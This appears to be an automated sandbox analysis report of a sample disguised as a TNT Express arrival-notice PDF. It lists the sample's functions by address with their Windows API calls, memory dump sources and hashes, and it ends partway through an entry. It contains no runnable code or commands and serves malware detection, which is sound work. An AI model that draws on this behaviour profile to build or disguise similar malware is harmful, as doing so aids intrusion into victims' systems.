Instruction Fuzzy Hash: 80415E71A0C60BFBDF199FA8C844BEEF774FB05324F208316E465A2290C7346994DB91

Function 00933874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 009338CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00933922
TranslateMessage.USER32(?), ref: 0093394B
DispatchMessageW.USER32(?), ref: 00933955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00933966

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 5e990a4076583e0b0b15f738652295521315f7ad99296017282eabb56a046b79
Instruction ID: cae16b027cd204f47a1ca59dc2b07d5d0e1d75e2cf73068c2965e64f119c8ea6
Opcode Fuzzy Hash: 5e990a4076583e0b0b15f738652295521315f7ad99296017282eabb56a046b79
Instruction Fuzzy Hash: 5031D77059C342DFEB39CB399849BB637ACEB05300F04856AE452C21A0E7B49A85EF11

Function 0093CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0093CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0093CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0093C21E,00000000), ref: 0093CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0093C21E,00000000), ref: 0093CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0093C21E,00000000), ref: 0093CFF2

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: dd43fe9d5bb24b72c33d9fe2cbc9455c74df488541be33b8834caea5e8ab818e
Instruction ID: 208cb8b3702990d0a6f42e19252b3861cff15bc6031b89901f8e17a4abb770f5
Opcode Fuzzy Hash: dd43fe9d5bb24b72c33d9fe2cbc9455c74df488541be33b8834caea5e8ab818e
Instruction Fuzzy Hash: 31313AB1504B05AFDB20DFA6C884AABBBFDEB14355F10442EF516E2241DB30EE419F60

Function 00921901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00921915
PostMessageW.USER32(00000001,00000201,00000001), ref: 009219C1
Sleep.KERNEL32(00000000,?,?,?), ref: 009219C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 009219DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 009219E2

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: aa5f6768740b9ac3f8a3277fc3f69247bd12e61c313bea167152b1b74c84091d
Instruction ID: 5b6f4f9fc457746328e395cbc8c530df65f3f120ed5928d234e6628d25deaa30
Opcode Fuzzy Hash: aa5f6768740b9ac3f8a3277fc3f69247bd12e61c313bea167152b1b74c84091d
Instruction Fuzzy Hash: 1831C275900329EFCB00CFA8ED99ADE7BB5EB54315F104225F921A72D1C7709A94DB90

Function 00955706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00955745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0095579D
_wcslen.LIBCMT ref: 009557AF
_wcslen.LIBCMT ref: 009557BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00955816

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: c13ebac62da0abf1eb859787bb36925a5f7a3132bd8952e6a864f86d6fd1131a
Instruction ID: 60aef8b8e51a3969e63ed6b7893282e7ca6f8ef555ad99441ece6d79eb64bd6a
Opcode Fuzzy Hash: c13ebac62da0abf1eb859787bb36925a5f7a3132bd8952e6a864f86d6fd1131a
Instruction Fuzzy Hash: 7621D770904608DADB20DFA6CC44AED77BCFF04322F104116ED29EA191D7748A89CF50

Function 008D990E Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 008D98CC
SetTextColor.GDI32(?,?), ref: 008D98D6
SetBkMode.GDI32(?,00000001), ref: 008D98E9
GetStockObject.GDI32(00000005), ref: 008D98F1
GetWindowLongW.USER32(?,000000EB), ref: 008D9952

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Color$LongModeObjectStockTextWindow
String ID:
API String ID: 1860813098-0
Opcode ID: 4000470bf308fe2e29bcdc0a0a5934af0e34de8d422eb422c14ef2fa7e4f035e
Instruction ID: 7b1a5f507c043ea184f114bd4099cc40c2342639c73e8d350ad78a285767b78e
Opcode Fuzzy Hash: 4000470bf308fe2e29bcdc0a0a5934af0e34de8d422eb422c14ef2fa7e4f035e
Instruction Fuzzy Hash: A121C171149354AFDB228F69AC64AE93F64EB12332F08026AE592CB2E1C7754942EB50

Function 00940930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00940951
GetForegroundWindow.USER32 ref: 00940968
GetDC.USER32(00000000), ref: 009409A4
GetPixel.GDI32(00000000,?,00000003), ref: 009409B0
ReleaseDC.USER32(00000000,00000003), ref: 009409E8

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: a659fdb5b8e516af32f599947e4106f0e13511aec4cce24f1d11792c4637bd24
Instruction ID: 44cf188b681366ad7477f6bad9aa81484de59ea2507337323fb2289c952e9d5c
Opcode Fuzzy Hash: a659fdb5b8e516af32f599947e4106f0e13511aec4cce24f1d11792c4637bd24
Instruction Fuzzy Hash: 35219D75604214AFD714EF69C889EAEBBF9EF88741F00842CE84AD7362CB30AD04DB50

Function 008FCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 008FCDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008FCDE9

Part of subcall function 008F3820: RtlAllocateHeap.NTDLL(00000000,?,00991444,?,008DFDF5,?,?,008CA976,00000010,00991440,008C13FC,?,008C13C6,?,008C1129), ref: 008F3852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 008FCE0F
_free.LIBCMT ref: 008FCE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008FCE31

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 59bd2652b08beb3a486c52417f3db994d2e785999461c1c8d86b00fcf3d186a6
Instruction ID: 35475c62d7087c8209ea2e1b4851ba8017509027d63336804fb584859ba622d3
Opcode Fuzzy Hash: 59bd2652b08beb3a486c52417f3db994d2e785999461c1c8d86b00fcf3d186a6
Instruction Fuzzy Hash: 660188B2A0571D7F2321167BAD48DBB6D6DFEC6BA13150129FA05D7201DB618E0192F1

Function 008D9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008D9693
SelectObject.GDI32(?,00000000), ref: 008D96A2
BeginPath.GDI32(?), ref: 008D96B9
SelectObject.GDI32(?,00000000), ref: 008D96E2

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 3c9f44ab955227f2c355929bb030cce4d203cc6bd041b18b4c01887a172a4df1
Instruction ID: d3e92b0e34e21168c0068c5668900973dd0e2155cb3b2cd2a894fd9600afaefc
Opcode Fuzzy Hash: 3c9f44ab955227f2c355929bb030cce4d203cc6bd041b18b4c01887a172a4df1
Instruction Fuzzy Hash: BF213D7082A306EFDB119F69FC147A97BA8FB60396F104317F451A62A0D3709891EB94

Function 00925711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00925726
_memcmp.LIBVCRUNTIME ref: 00925744
_memcmp.LIBVCRUNTIME ref: 00925757
_memcmp.LIBVCRUNTIME ref: 0092576F
_memcmp.LIBVCRUNTIME ref: 00925787

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: a1b68b5b1af565dd9016106846c428eb9410b1641092a0ea3e53d6a06842876d
Instruction ID: 26d56633afedcb2262faa80920dcbf37f87c401a4146f86c33f9ee953955385c
Opcode Fuzzy Hash: a1b68b5b1af565dd9016106846c428eb9410b1641092a0ea3e53d6a06842876d
Instruction Fuzzy Hash: A401F571681669FBD6089116AE86FBB734CEB623A9F010030FD08DA249F734EE1483E1

Function 008F2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,008EF2DE,008F3863,00991444,?,008DFDF5,?,?,008CA976,00000010,00991440,008C13FC,?,008C13C6), ref: 008F2DFD
_free.LIBCMT ref: 008F2E32
_free.LIBCMT ref: 008F2E59
SetLastError.KERNEL32(00000000,008C1129), ref: 008F2E66
SetLastError.KERNEL32(00000000,008C1129), ref: 008F2E6F

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 8faeab14cced6cb1fdc7b3fa9006b4e11bdc97d498efcde2d27aa2266ec950cc
Instruction ID: fdbd13c11ddd9a70d9e8ba213f4f2fb0f65669c7ccd20d576ccf145e55b26f45
Opcode Fuzzy Hash: 8faeab14cced6cb1fdc7b3fa9006b4e11bdc97d498efcde2d27aa2266ec950cc
Instruction Fuzzy Hash: 4001F47225970C6BC61267796C89D3B2A59FBC17B6B300029FB21E22D3FB708C015221

Function 0092000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0091FF41,80070057,?,?,?,0092035E), ref: 0092002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0091FF41,80070057,?,?), ref: 00920046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0091FF41,80070057,?,?), ref: 00920054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0091FF41,80070057,?), ref: 00920064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0091FF41,80070057,?,?), ref: 00920070

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 1b9aedb834c026763de512ea61bb25f49f9468f208592f0d659d536e48eeff54
Instruction ID: 5d6f4c90721b11295b960049c2f6f29125bb466ecb19bb6db1687e65fc064e47
Opcode Fuzzy Hash: 1b9aedb834c026763de512ea61bb25f49f9468f208592f0d659d536e48eeff54
Instruction Fuzzy Hash: A601A2B2650328BFEB104F69EC44BAA7AEDEF84792F144124F905D2225E775DD40DBA0

Function 0092E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0092E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0092E9A5
Sleep.KERNEL32(00000000), ref: 0092E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0092E9B7
Sleep.KERNEL32 ref: 0092E9F3

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: e9ec75d171d65f896c29b309a5ace512f8b9486f1311cfcf6af715e1d75ac588
Instruction ID: ae10a2e10b699840b6526bb6290dd3697863a27aabb70686da3b587057c37646
Opcode Fuzzy Hash: e9ec75d171d65f896c29b309a5ace512f8b9486f1311cfcf6af715e1d75ac588
Instruction Fuzzy Hash: DE015775C09A3DDFCF00ABE5E899AEDBB78BB08701F000546E502B2244CB349594DBA1

Function 009210F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00921114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00920B9B,?,?,?), ref: 00921120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00920B9B,?,?,?), ref: 0092112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00920B9B,?,?,?), ref: 00921136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0092114D

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: e4a45dcd45396590b01fee521c5b6841b4d584269da1c8d24f802689b1814c1f
Instruction ID: 203b299983bcd1d4d881863a54ad826323482b2c167c118706b0f8b6005cf46a
Opcode Fuzzy Hash: e4a45dcd45396590b01fee521c5b6841b4d584269da1c8d24f802689b1814c1f
Instruction Fuzzy Hash: B2016DB5104315BFDB114F65EC49A6A3F6EEF89361B100414FA41D3350DB31DC10DB60

Function 00920FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00920FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00920FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00920FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00920FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00921002

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: d3400cf33a32c69f5e8f38c258959ccbb1101fe6edd12dfe8e13315999e2a5a9
Instruction ID: a289d92dc652a6a583a1c41ea571fd53b335fad83273a8740f86d514355c4c49
Opcode Fuzzy Hash: d3400cf33a32c69f5e8f38c258959ccbb1101fe6edd12dfe8e13315999e2a5a9
Instruction Fuzzy Hash: 4FF0A9B5245315AFDB210FA6AC49F5A3BADEF89762F100414FA06C62A0CA30DC909B60

Function 00921014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0092102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00921036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00921045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0092104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00921062

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 53e473dd634d5bf61ce405e51a7c99a443b57105572f553533f550f517c2d9cd
Instruction ID: ba14e36e87d9afe401590a10e791b808ed6ae135a3679ca8942a7b97b8cb9e1a
Opcode Fuzzy Hash: 53e473dd634d5bf61ce405e51a7c99a443b57105572f553533f550f517c2d9cd
Instruction Fuzzy Hash: C8F0CDB5244315EFDB211FA6EC48F5A3BADEF89762F100414FA06C7290CA30D890DB60

Function 0093030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0093017D,?,009332FC,?,00000001,00902592,?), ref: 00930324
CloseHandle.KERNEL32(?,?,?,?,0093017D,?,009332FC,?,00000001,00902592,?), ref: 00930331
CloseHandle.KERNEL32(?,?,?,?,0093017D,?,009332FC,?,00000001,00902592,?), ref: 0093033E
CloseHandle.KERNEL32(?,?,?,?,0093017D,?,009332FC,?,00000001,00902592,?), ref: 0093034B
CloseHandle.KERNEL32(?,?,?,?,0093017D,?,009332FC,?,00000001,00902592,?), ref: 00930358
CloseHandle.KERNEL32(?,?,?,?,0093017D,?,009332FC,?,00000001,00902592,?), ref: 00930365

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 876e68ff55a98765a999bfbd4f246d63d54924467efab677dd6179821b5b4530
Instruction ID: 253951d80cfe682ee2355366c7ae338c8b9be9650b0fbd751844d7eec69bc6ef
Opcode Fuzzy Hash: 876e68ff55a98765a999bfbd4f246d63d54924467efab677dd6179821b5b4530
Instruction Fuzzy Hash: EE01AA72800B159FCB30AF66D8A0812FBF9FFA03153158A3FD19652931C3B1A998DF80

Function 008FD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008FD752

Part of subcall function 008F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008FD7D1,00000000,00000000,00000000,00000000,?,008FD7F8,00000000,00000007,00000000,?,008FDBF5,00000000), ref: 008F29DE
Part of subcall function 008F29C8: GetLastError.KERNEL32(00000000,?,008FD7D1,00000000,00000000,00000000,00000000,?,008FD7F8,00000000,00000007,00000000,?,008FDBF5,00000000,00000000), ref: 008F29F0

_free.LIBCMT ref: 008FD764
_free.LIBCMT ref: 008FD776
_free.LIBCMT ref: 008FD788
_free.LIBCMT ref: 008FD79A

Memory Dump Source

